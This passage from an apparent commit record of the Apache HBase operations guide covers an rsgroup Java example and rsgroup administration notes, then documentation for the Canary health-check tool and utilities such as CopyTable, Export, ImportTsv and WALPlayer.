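\nThe same operations are available from Java. Here is a minimal sketch; it assumes the `RSGroupAdminClient` class that ships with the rsgroup module (it is not part of the public `Admin` interface, so treat the class and method names as illustrative of the Java route rather than a stable API):\n\n[source,java]\n----\nimport java.io.IOException;\nimport java.util.Collections;\nimport org.apache.hadoop.conf.Configuration;\nimport org.apache.hadoop.hbase.HBaseConfiguration;\nimport org.apache.hadoop.hbase.TableName;\nimport org.apache.hadoop.hbase.client.Connection;\nimport org.apache.hadoop.hbase.client.ConnectionFactory;\nimport org.apache.hadoop.hbase.net.Address;\nimport org.apache.hadoop.hbase.rsgroup.RSGroupAdminClient;\n\npublic class RsGroupExample {\n  public static void main(String[] args) throws IOException {\n    Configuration conf = HBaseConfiguration.create();\n    try (Connection connection = ConnectionFactory.createConnection(conf)) {\n      RSGroupAdminClient rsgroupAdmin = new RSGroupAdminClient(connection);\n      rsgroupAdmin.addRSGroup(\"my_group\");\n      \/\/ Servers are identified by hostname and port only; see the note below.\n      rsgroupAdmin.moveServers(\n          Collections.singleton(Address.fromString(\"k.att.net:51129\")), \"my_group\");\n      rsgroupAdmin.moveTables(\n          Collections.singleton(TableName.valueOf(\"myTable\")), \"my_group\");\n    }\n  }\n}\n----\n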
\n.Hostname and Port vs ServerName\n[NOTE]\n====\nThe rsgroup feature refers to servers in a cluster with hostname and port only.\nIt does not make use of the HBase ServerName type identifying RegionServers;\ni.e. hostname + port + starttime to distinguish RegionServer instances. The\nrsgroup feature keeps working across RegionServer restarts, so the starttime of\nServerName -- and hence the ServerName type -- is not appropriate.\n====\n\n=== Administration\n\nServers come and go over the lifetime of a cluster. Currently, you must\nmanually align the servers referenced in rsgroups with the actual state of\nnodes in the running cluster. What we mean by this is that if you decommission\na server, then you must update rsgroups as part of your server decommission\nprocess, removing references.\n\nBut, there is no _remove_offline_servers_rsgroup_ command, you say!\n\nThe way to remove a server is to move it to the `default` group. The `default`\ngroup is special. All rsgroups but the `default` rsgroup are static in that\nedits via the shell commands are persisted to the system `hbase:rsgroup` table.\nIf they reference a decommissioned server, then they need to be updated to undo\nthe reference.\n\nThe `default` group is not like other rsgroups in that it is dynamic. Its server\nlist mirrors the current state of the cluster; i.e. if you shutdown a server that\nwas part of the `default` rsgroup, and then do a _get_rsgroup_ `default` to list\nits content in the shell, the server will no longer be listed. For non-`default`\ngroups, though a node may be offline, it will persist in the non-`default` group's\nlist of servers. But if you move the offline server from the non-`default` rsgroup\nto `default`, it will not show in the `default` list. It will just be dropped.\n\n=== Best Practice\nThe authors of the rsgroup feature, the Yahoo! HBase Engineering team, have been\nrunning it on their grid for a good while now and have come up with a few best\npractices informed by their experience.\n\n==== Isolate System Tables\nEither have a system rsgroup where all the system tables are, or just leave the\nsystem tables in the `default` rsgroup and have all user-space tables in\nnon-`default` rsgroups.\n\n==== Dead Nodes\nYahoo! has found it useful at their scale to keep a special rsgroup of dead or\nquestionable nodes; this is one means of keeping them out of the running until repair.\n\nBe careful replacing dead nodes in an rsgroup. Ensure there are enough live nodes\nbefore you start moving out the dead. Move in good live nodes first if you have to.\n\n=== Troubleshooting\nViewing the Master log will give you insight into rsgroup operation.\n\nIf it appears stuck, restart the Master process.\n\n\n\n","old_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. 
You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[ops_mgt]]\n= Apache HBase Operational Management\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nThis chapter covers the operational tools and practices required of a running Apache HBase cluster.\nThe subject of operations is related to the topics of <<trouble>>, <<performance>>, and <<configuration>> but is a distinct topic in itself.\n\n[[tools]]\n== HBase Tools and Utilities\n\nHBase provides several tools for administration, analysis, and debugging of your cluster.\nThe entry-point to most of these tools is the _bin\/hbase_ command, though some tools are available in the _dev-support\/_ directory.\n\nTo see usage instructions for the _bin\/hbase_ command, run it with no arguments, or with the `-h` argument.\nThese are the usage instructions for HBase 0.98.x.\nSome commands, such as `version`, `pe`, `ltt`, and `clean`, are not available in previous versions.\n\n----\n$ bin\/hbase\nUsage: hbase [<options>] <command> [<args>]\nOptions:\n --config DIR Configuration direction to use. Default: .\/conf\n --hosts HOSTS Override the list in 'regionservers' file\n\nCommands:\nSome commands take arguments. Pass no args or -h for usage.\n shell Run the HBase shell\n hbck Run the hbase 'fsck' tool\n wal Write-ahead-log analyzer\n hfile Store file analyzer\n zkcli Run the ZooKeeper shell\n upgrade Upgrade hbase\n master Run an HBase HMaster node\n regionserver Run an HBase HRegionServer node\n zookeeper Run a ZooKeeper server\n rest Run an HBase REST server\n thrift Run the HBase Thrift server\n thrift2 Run the HBase Thrift2 server\n clean Run the HBase clean up script\n classpath Dump hbase CLASSPATH\n mapredcp Dump CLASSPATH entries required by mapreduce\n pe Run PerformanceEvaluation\n ltt Run LoadTestTool\n version Print the version\n CLASSNAME Run the class named CLASSNAME\n----\n\nSome of the tools and utilities below are Java classes which are passed directly to the _bin\/hbase_ command, as referred to in the last line of the usage instructions.\nOthers, such as `hbase shell` (<<shell>>), `hbase upgrade` (<<upgrading>>), and `hbase thrift` (<<thrift>>), are documented elsewhere in this guide.\n\n=== Canary\n\nThere is a Canary class that can help users canary-test the HBase cluster status, at the granularity of every column family of every region, or of every RegionServer.\nTo see the usage, use the `--help` parameter.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -help\n\nUsage: bin\/hbase org.apache.hadoop.hbase.tool.Canary [opts] [table1 [table2]...] 
| [regionserver1 [regionserver2]..]\n where [opts] are:\n -help Show this help and exit.\n -regionserver replace the table argument to regionserver,\n which means to enable regionserver mode\n -daemon Continuous check at defined intervals.\n -interval <N> Interval between checks (sec)\n -e Use region\/regionserver as regular expression\n which means the region\/regionserver is regular expression pattern\n -f <B> stop whole program if first error occurs, default is true\n -t <N> timeout for a check, default is 600000 (milliseconds)\n -writeSniffing enable the write sniffing in canary\n -treatFailureAsError treats read \/ write failure as error\n -writeTable The table used for write sniffing. Default is hbase:canary\n -D<configProperty>=<value> assigning or override the configuration params\n----\n\nThis tool returns non-zero error codes to the user so that it can cooperate with other monitoring tools, such as Nagios.\nThe error code definitions are:\n\n[source,java]\n----\nprivate static final int USAGE_EXIT_CODE = 1;\nprivate static final int INIT_ERROR_EXIT_CODE = 2;\nprivate static final int TIMEOUT_ERROR_EXIT_CODE = 3;\nprivate static final int ERROR_EXIT_CODE = 4;\n----\n
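\nIf you wire the Canary into your own monitoring rather than Nagios, the exit code is all you need to inspect. Below is a minimal, hypothetical Java wrapper (the class name and messages are illustrative, not part of HBase) that launches the canary and maps the documented exit codes:\n\n[source,java]\n----\nimport java.io.IOException;\n\n\/\/ Hypothetical wrapper: runs the canary and interprets its documented exit codes.\npublic class CanaryCheck {\n  public static void main(String[] args) throws IOException, InterruptedException {\n    Process p = new ProcessBuilder(\"bin\/hbase\", \"canary\")\n        .inheritIO() \/\/ stream canary output to our own stdout\/stderr\n        .start();\n    int code = p.waitFor();\n    switch (code) {\n      case 0: System.out.println(\"OK\"); break;\n      case 1: System.out.println(\"usage error\"); break; \/\/ USAGE_EXIT_CODE\n      case 2: System.out.println(\"initialization error\"); break; \/\/ INIT_ERROR_EXIT_CODE\n      case 3: System.out.println(\"timeout\"); break; \/\/ TIMEOUT_ERROR_EXIT_CODE\n      default: System.out.println(\"check failed\"); \/\/ ERROR_EXIT_CODE\n    }\n    System.exit(code); \/\/ propagate the code to the calling monitoring system\n  }\n}\n----\n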
\nHere are some examples based on the following case: there are two tables, test-01 and test-02, each with two column families, cf1 and cf2, deployed across 3 RegionServers, as shown in the following table.\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| RegionServer\n| test-01\n| test-02\n| rs1 | r1 | r2\n| rs2 | r2 |\n| rs3 | r2 | r1\n|===\n\nThe following examples are based on this case.\n\n==== Canary test for every column family (store) of every region of every table\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary\n\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf1 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf2 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf1 in 4ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf2 in 1ms\n...\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf1 in 5ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf2 in 3ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. column family cf1 in 31ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. column family cf2 in 8ms\n----\n\nAs you can see, table test-01 has two regions and two column families, so the Canary tool picks 4 small pieces of data from 4 (2 regions * 2 stores) different stores.\nThis is the default behavior of the tool.\n\n==== Canary test for every column family (store) of every region of specific table(s)\n\nYou can also test one or more specific tables.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary test-01 test-02\n----\n\n==== Canary test with RegionServer granularity\n\nThis will pick one small piece of data from each RegionServer; you can also pass RegionServer names as input options to canary-test specific RegionServers.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -regionserver\n\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs2 in 72ms\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-02 on region server:rs3 in 34ms\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs1 in 56ms\n----\n\n==== Canary test with regular expression pattern\n\nThis will test both tables, test-01 and test-02.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -e test-0[1-2]\n----\n\n==== Run canary test in daemon mode\n\nRun repeatedly with the interval defined by the `-interval` option, whose default value is 6 seconds.\nThis daemon will stop itself and return a non-zero error code if any error occurs, because the default value of the `-f` option is true.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -daemon\n----\n\nRun repeatedly with a 5 second interval, and do not stop even if errors occur in the test:\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -daemon -interval 5 -f false\n----\n\n==== Force timeout if canary test stuck\n\nIn some cases the request is stuck and no response is sent back to the client. This can happen with dead RegionServers which the master has not yet noticed.\nBecause of this we provide a timeout option to kill the canary test and return a non-zero error code.\nThis run sets the timeout value to 60 seconds; the default value is 600 seconds (600000 milliseconds).\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -t 60000\n----\n\n==== Enable write sniffing in canary\n\nBy default, the canary tool only checks read operations; it is hard to find a problem in the\nwrite path. To enable write sniffing, you can run the canary with the `-writeSniffing` option.\nWhen write sniffing is enabled, the canary tool will create an hbase table and make sure the\nregions of the table are distributed across all region servers. In each sniffing period, the canary will\ntry to put data to these regions to check the write availability of each region server.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing\n----\n\nThe default write table is `hbase:canary` and can be specified by the option `-writeTable`.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing -writeTable ns:canary\n----\n\nThe default value size of each put is 10 bytes, and you can set it via the config key\n`hbase.canary.write.value.size`.\n\n==== Treat read \/ write failure as error\n\nBy default, the canary tool only logs read failures, due to e.g. RetriesExhaustedException,\nwhile returning a normal exit code. To treat read \/ write failure as error, you can run the canary\nwith the `-treatFailureAsError` option. 
When enabled, a read \/ write failure results in an error\nexit code.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary --treatFailureAsError\n----\n\n==== Running Canary in a Kerberos-enabled Cluster\n\nTo run Canary in a Kerberos-enabled cluster, configure the following two properties in _hbase-site.xml_:\n\n* `hbase.client.keytab.file`\n* `hbase.client.kerberos.principal`\n\nKerberos credentials are refreshed every 30 seconds when Canary runs in daemon mode.\n\nTo configure the DNS interface for the client, configure the following optional properties in _hbase-site.xml_.\n\n* `hbase.client.dns.interface`\n* `hbase.client.dns.nameserver`\n\n.Canary in a Kerberos-Enabled Cluster\n====\nThis example shows each of the properties with valid values.\n\n[source,xml]\n----\n<property>\n <name>hbase.client.kerberos.principal<\/name>\n <value>hbase\/_HOST@YOUR-REALM.COM<\/value>\n<\/property>\n<property>\n <name>hbase.client.keytab.file<\/name>\n <value>\/etc\/hbase\/conf\/keytab.krb5<\/value>\n<\/property>\n<!-- optional params -->\n<property>\n <name>hbase.client.dns.interface<\/name>\n <value>default<\/value>\n<\/property>\n<property>\n <name>hbase.client.dns.nameserver<\/name>\n <value>default<\/value>\n<\/property>\n----\n====\n\n[[health.check]]\n=== Health Checker\n\nYou can configure HBase to run a script periodically and, if it fails N times (configurable), have the server exit.\nSee _HBASE-7351 Periodic health check script_ for configurations and details.\n\n=== Driver\n\nSeveral frequently-accessed utilities are provided as `Driver` classes, and executed by the _bin\/hbase_ command.\nThese utilities represent MapReduce jobs which run on your cluster.\nThey are run in the following way, replacing _UtilityName_ with the utility you want to run.\nThis command assumes you have set the environment variable `HBASE_HOME` to the directory where HBase is unpacked on your server.\n\n----\n\n${HBASE_HOME}\/bin\/hbase org.apache.hadoop.hbase.mapreduce.UtilityName\n----\n\nThe following utilities are available:\n\n`LoadIncrementalHFiles`::\n Complete a bulk data load.\n\n`CopyTable`::\n Export a table from the local cluster to a peer cluster.\n\n`Export`::\n Write table data to HDFS.\n\n`Import`::\n Import data written by a previous `Export` operation.\n\n`ImportTsv`::\n Import data in TSV format.\n\n`RowCounter`::\n Count rows in an HBase table.\n\n`CellCounter`::\n Count cells in an HBase table.\n\n`replication.VerifyReplication`::\n Compare the data from tables in two different clusters.\n WARNING: It doesn't work for incrementColumnValues'd cells since the timestamp is changed.\n Note that this command is in a different package than the others.\n\nEach command except `RowCounter` and `CellCounter` accepts a single `--help` argument to print usage instructions.\n\n[[hbck]]\n=== HBase `hbck`\n\nTo run `hbck` against your HBase cluster, run `$ .\/bin\/hbase hbck`. At the end of the command's output it prints `OK` or `INCONSISTENCY`.\nIf your cluster reports inconsistencies, pass `-details` to see more detail emitted.\nIf inconsistencies are reported, run `hbck` a few times because the inconsistency may be transient (e.g. 
cluster is starting up or a region is splitting).\n Passing `-fix` may correct the inconsistency (this is an experimental feature).\n\nFor more information, see <<hbck.in.depth>>.\n\n[[hfile_tool2]]\n=== HFile Tool\n\nSee <<hfile_tool>>.\n\n=== WAL Tools\n\n[[hlog_tool]]\n==== FSHLog tool\n\nThe main method on `FSHLog` offers manual split and dump facilities.\nPass it WALs or the product of a split, the content of the _recovered.edits_ directory.\n\nYou can get a textual dump of a WAL file content by doing the following:\n\n----\n $ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --dump hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n\nThe return code will be non-zero if there are any issues with the file, so you can test the wholesomeness of the file by redirecting `STDOUT` to `\/dev\/null` and testing the program return code.\n\nSimilarly you can force a split of a log file directory by doing:\n\n----\n $ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --split hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/\n----\n\n[[hlog_tool.prettyprint]]\n===== WALPrettyPrinter\n\nThe `WALPrettyPrinter` is a tool with configurable options to print the contents of a WAL.\nYou can invoke it via the HBase cli with the 'wal' command.\n\n----\n $ .\/bin\/hbase wal hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n\n.WAL Printing in older versions of HBase\n[NOTE]\n====\nPrior to version 2.0, the `WALPrettyPrinter` was called the `HLogPrettyPrinter`, after an internal name for HBase's write ahead log.\nIn those versions, you can print the contents of a WAL using the same configuration as above, but with the 'hlog' command.\n\n----\n $ .\/bin\/hbase hlog hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n====\n\n[[compression.tool]]\n=== Compression Tool\n\nSee <<compression.test,compression.test>>.\n\n[[copy.table]]\n=== CopyTable\n\nCopyTable is a utility that can copy part or all of a table, either to the same cluster or another cluster.\nThe target table must first exist.\nThe usage is as follows:\n\n----\n\n$ .\/bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --help\nUsage: CopyTable [general options] [--starttime=X] [--endtime=Y] [--new.name=NEW] [--peer.adr=ADR] <tablename>\n\nOptions:\n rs.class hbase.regionserver.class of the peer cluster,\n specify if different from current cluster\n rs.impl hbase.regionserver.impl of the peer cluster,\n startrow the start row\n stoprow the stop row\n starttime beginning of the time range (unixtime in millis)\n without endtime means from starttime to forever\n endtime end of the time range. 
Ignored if no starttime specified.\n versions number of cell versions to copy\n new.name new table's name\n peer.adr Address of the peer cluster given in the format\n hbase.zookeeper.quorum:hbase.zookeeper.client.port:zookeeper.znode.parent\n families comma-separated list of families to copy\n To copy from cf1 to cf2, give sourceCfName:destCfName.\n To keep the same name, just give \"cfName\"\n all.cells also copy delete markers and deleted cells\n\nArgs:\n tablename Name of the table to copy\n\nExamples:\n To copy 'TestTable' to a cluster that uses replication for a 1 hour window:\n $ bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --starttime=1265875194289 --endtime=1265878794289 --peer.adr=server1,server2,server3:2181:\/hbase --families=myOldCf:myNewCf,cf2,cf3 TestTable\n\nFor performance consider the following general options:\n It is recommended that you set the following to >=100. A higher value uses more memory but\n decreases the round trip time to the server and may increase performance.\n -Dhbase.client.scanner.caching=100\n The following should always be set to false, to prevent writing data twice, which may produce\n inaccurate results.\n -Dmapred.map.tasks.speculative.execution=false\n----\n\n.Scanner Caching\n[NOTE]\n====\nCaching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n====\n\n.Versions\n[NOTE]\n====\nBy default, the CopyTable utility only copies the latest version of row cells unless `--versions=n` is explicitly specified in the command.\n====\n\nSee Jonathan Hsieh's link:https:\/\/blog.cloudera.com\/blog\/2012\/06\/online-hbase-backups-with-copytable-2\/[Online\n HBase Backups with CopyTable] blog post for more on `CopyTable`.\n\n[[export]]\n=== Export\n\nExport is a utility that will dump the contents of a table to HDFS in a sequence file.\nExport can be run via a Coprocessor Endpoint or MapReduce. Invoke via:\n\n*mapreduce-based Export*\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Export <tablename> <outputdir> [<versions> [<starttime> [<endtime>]]]\n----\n\n*endpoint-based Export*\n----\n$ bin\/hbase org.apache.hadoop.hbase.coprocessor.Export <tablename> <outputdir> [<versions> [<starttime> [<endtime>]]]\n----\n\n*The Comparison of Endpoint-based Export And Mapreduce-based Export*\n|===\n||Endpoint-based Export|Mapreduce-based Export\n\n|HBase version requirement\n|2.0+\n|0.2.1+\n\n|Maven dependency\n|hbase-endpoint\n|hbase-mapreduce (2.0+), hbase-server (prior to 2.0)\n\n|Requirement before dump\n|mount the endpoint.Export on the target table\n|deploy the MapReduce framework\n\n|Read latency\n|low, directly read the data from region\n|normal, traditional RPC scan\n\n|Read Scalability\n|depend on number of regions\n|depend on number of mappers (see TableInputFormatBase#getSplits)\n\n|Timeout\n|operation timeout. configured by hbase.client.operation.timeout\n|scan timeout. configured by hbase.client.scanner.timeout.period\n\n|Permission requirement\n|READ, EXECUTE\n|READ\n\n|Fault tolerance\n|no\n|depend on MapReduce\n|===\n\n\nNOTE: To see usage instructions, run the command with no options. Available options include\nspecifying column families and applying filters during the export.\n\nBy default, the `Export` tool only exports the newest version of a given cell, regardless of the number of versions stored. 
To export more than one version, replace *_<versions>_* with the desired number of versions.\n\nNote: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\n[[import]]\n=== Import\n\nImport is a utility that will load data that has been exported back into HBase.\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\nNOTE: To see usage instructions, run the command with no options.\n\nTo import 0.94 exported files in a 0.96 cluster or onwards, you need to set system property \"hbase.import.version\" when running the import command as below:\n\n----\n$ bin\/hbase -Dhbase.import.version=0.94 org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\n[[importtsv]]\n=== ImportTsv\n\nImportTsv is a utility that will load data in TSV format into HBase.\nIt has two distinct usages: loading data from TSV format in HDFS into HBase via Puts, and preparing StoreFiles to be loaded via the `completebulkload`.\n\nTo load data via Puts (i.e., non-bulk loading):\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c <tablename> <hdfs-inputdir>\n----\n\nTo generate StoreFiles for bulk-loading:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c -Dimporttsv.bulk.output=hdfs:\/\/storefile-outputdir <tablename> <hdfs-data-inputdir>\n----\n\nThese generated StoreFiles can be loaded into HBase via <<completebulkload,completebulkload>>.\n\n[[importtsv.options]]\n==== ImportTsv Options\n\nRunning `ImportTsv` with no arguments prints brief usage information:\n\n----\n\nUsage: importtsv -Dimporttsv.columns=a,b,c <tablename> <inputdir>\n\nImports the given input directory of TSV data into the specified table.\n\nThe column names of the TSV data must be specified using the -Dimporttsv.columns\noption. This option takes the form of comma-separated column names, where each\ncolumn name is either a simple column family, or a columnfamily:qualifier. The special\ncolumn name HBASE_ROW_KEY is used to designate that this column should be used\nas the row key for each imported record. You must specify exactly one column\nto be the row key, and you must specify a column name for every column that exists in the\ninput data.\n\nBy default importtsv will load data directly into HBase. 
To instead generate\nHFiles of data to prepare for a bulk data load, pass the option:\n -Dimporttsv.bulk.output=\/path\/for\/output\n Note: the target table will be created with default column family descriptors if it does not already exist.\n\nOther options that may be specified with -D include:\n -Dimporttsv.skip.bad.lines=false - fail if encountering an invalid line\n '-Dimporttsv.separator=|' - eg separate on pipes instead of tabs\n -Dimporttsv.timestamp=currentTimeAsLong - use the specified timestamp for the import\n -Dimporttsv.mapper.class=my.Mapper - A user-defined Mapper to use instead of org.apache.hadoop.hbase.mapreduce.TsvImporterMapper\n----\n\n[[importtsv.example]]\n==== ImportTsv Example\n\nFor example, assume that we are loading data into a table called 'datatsv' with a ColumnFamily called 'd' with two columns \"c1\" and \"c2\".\n\nAssume that an input file exists as follows:\n----\n\nrow1\tc1\tc2\nrow2\tc1\tc2\nrow3\tc1\tc2\nrow4\tc1\tc2\nrow5\tc1\tc2\nrow6\tc1\tc2\nrow7\tc1\tc2\nrow8\tc1\tc2\nrow9\tc1\tc2\nrow10\tc1\tc2\n----\n\nFor ImportTsv to use this input file, the command line needs to look like this:\n\n----\n\n HADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` ${HADOOP_HOME}\/bin\/hadoop jar ${HBASE_HOME}\/hbase-server-VERSION.jar importtsv -Dimporttsv.columns=HBASE_ROW_KEY,d:c1,d:c2 -Dimporttsv.bulk.output=hdfs:\/\/storefileoutput datatsv hdfs:\/\/inputfile\n----\n\n\\... and in this example the first column is the rowkey, which is why HBASE_ROW_KEY is used.\nThe second and third columns in the file will be imported as \"d:c1\" and \"d:c2\", respectively.\n\n[[importtsv.warning]]\n==== ImportTsv Warning\n\nIf you are preparing a lot of data for bulk loading, make sure the target HBase table is pre-split appropriately.\n\n[[importtsv.also]]\n==== See Also\n\nFor more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>.\n\n[[completebulkload]]\n=== CompleteBulkLoad\n\nThe `completebulkload` utility will move generated StoreFiles into an HBase table.\nThis utility is often used in conjunction with output from <<importtsv,importtsv>>.\n\nThere are two ways to invoke this utility, with an explicit classname or via the driver:\n\n.Explicit Classname\n----\n$ bin\/hbase org.apache.hadoop.hbase.tool.LoadIncrementalHFiles <hdfs:\/\/storefileoutput> <tablename>\n----\n\n.Driver\n----\nHADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` ${HADOOP_HOME}\/bin\/hadoop jar ${HBASE_HOME}\/hbase-server-VERSION.jar completebulkload <hdfs:\/\/storefileoutput> <tablename>\n----\n\n[[completebulkload.warning]]\n==== CompleteBulkLoad Warning\n\nData generated via MapReduce is often created with file permissions that are not compatible with the running HBase process.\nAssuming you're running HDFS with permissions enabled, those permissions will need to be updated before you run CompleteBulkLoad.\n\nFor more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>.\n\n=== WALPlayer\n\nWALPlayer is a utility to replay WAL files into HBase.\n\nThe WAL can be replayed for a set of tables or all tables, and a timerange can be provided (in milliseconds). 
The WAL is filtered to this set of tables.\nThe output can optionally be mapped to another set of tables.\n\nWALPlayer can also generate HFiles for later bulk importing; in that case only a single table and no mapping can be specified.\n\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer [options] <wal inputdir> <tables> [<tableMappings>]\n----\n\nFor example:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer \/backuplogdir oldTable1,oldTable2 newTable1,newTable2\n----\n\nWALPlayer, by default, runs as a mapreduce job.\nTo NOT run WALPlayer as a mapreduce job on your cluster, force it to run all in the local process by adding the flag `-Dmapreduce.jobtracker.address=local` on the command line.\n\n[[rowcounter]]\n=== RowCounter and CellCounter\n\nlink:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/mapreduce\/RowCounter.html[RowCounter] is a mapreduce job to count all the rows of a table.\nThis is a good utility to use as a sanity check to ensure that HBase can read all the blocks of a table if there are any concerns of metadata inconsistency.\nIt will run the mapreduce all in a single process, but it will run faster if you have a MapReduce cluster in place for it to exploit. It is also possible to limit\nthe time range of data to be scanned by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.RowCounter <tablename> [<column1> <column2>...]\n----\n\nRowCounter only counts one version per cell.\n\nNote: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\nHBase ships another diagnostic mapreduce job called link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/mapreduce\/CellCounter.html[CellCounter].\nLike RowCounter, it is a diagnostic job, but it gathers more fine-grained statistics about your table.\nThe statistics gathered by CellCounter include:\n\n* Total number of rows in the table.\n* Total number of CFs across all rows.\n* Total qualifiers across all rows.\n* Total occurrence of each CF.\n* Total occurrence of each qualifier.\n* Total number of versions of each qualifier.\n\nThe program allows you to limit the scope of the run.\nProvide a row regex or prefix to limit the rows to analyze.\nSpecify a time range to scan the table by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.\n\nUse `hbase.mapreduce.scan.column.family` to specify scanning a single column family.\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.CellCounter <tablename> <outputDir> [regex or prefix]\n----\n\nNote: just like RowCounter, caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\n=== mlockall\n\nIt is possible to optionally pin your servers in physical memory, making them less likely to be swapped out in oversubscribed environments, by having the servers call link:http:\/\/linux.die.net\/man\/2\/mlockall[mlockall] on startup.\nSee link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4391[HBASE-4391 Add ability to\n start RS as root and call mlockall] for how to build the optional library and have it run on startup.\n\n[[compaction.tool]]\n=== Offline Compaction Tool\n\nSee the usage for the\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/regionserver\/CompactionTool.html[CompactionTool].\nRun it like:\n\n[source, bash]\n----\n$ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.CompactionTool\n----\n\n=== 
`hbase clean`\n\nThe `hbase clean` command cleans HBase data from ZooKeeper, HDFS, or both.\nIt is appropriate to use for testing.\nRun it with no options for usage instructions.\nThe `hbase clean` command was introduced in HBase 0.98.\n\n----\n\n$ bin\/hbase clean\nUsage: hbase clean (--cleanZk|--cleanHdfs|--cleanAll)\nOptions:\n --cleanZk cleans hbase related data from zookeeper.\n --cleanHdfs cleans hbase related data from hdfs.\n --cleanAll cleans hbase related data from both zookeeper and hdfs.\n----\n\n=== `hbase pe`\n\nThe `hbase pe` command is a shortcut provided to run the `org.apache.hadoop.hbase.PerformanceEvaluation` tool, which is used for testing.\nThe `hbase pe` command was introduced in HBase 0.98.4.\n\nThe PerformanceEvaluation tool accepts many different options and commands.\nFor usage instructions, run the command with no options.\n\nTo run PerformanceEvaluation prior to HBase 0.98.4, issue the command `hbase org.apache.hadoop.hbase.PerformanceEvaluation`.\n\nThe PerformanceEvaluation tool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLs and visibility labels, multiget support for RPC calls, increased sampling sizes, an option to randomly sleep during testing, and the ability to \"warm up\" the cluster before testing starts.\n\n=== `hbase ltt`\n\nThe `hbase ltt` command is a shortcut provided to run the `org.apache.hadoop.hbase.util.LoadTestTool` utility, which is used for testing.\nThe `hbase ltt` command was introduced in HBase 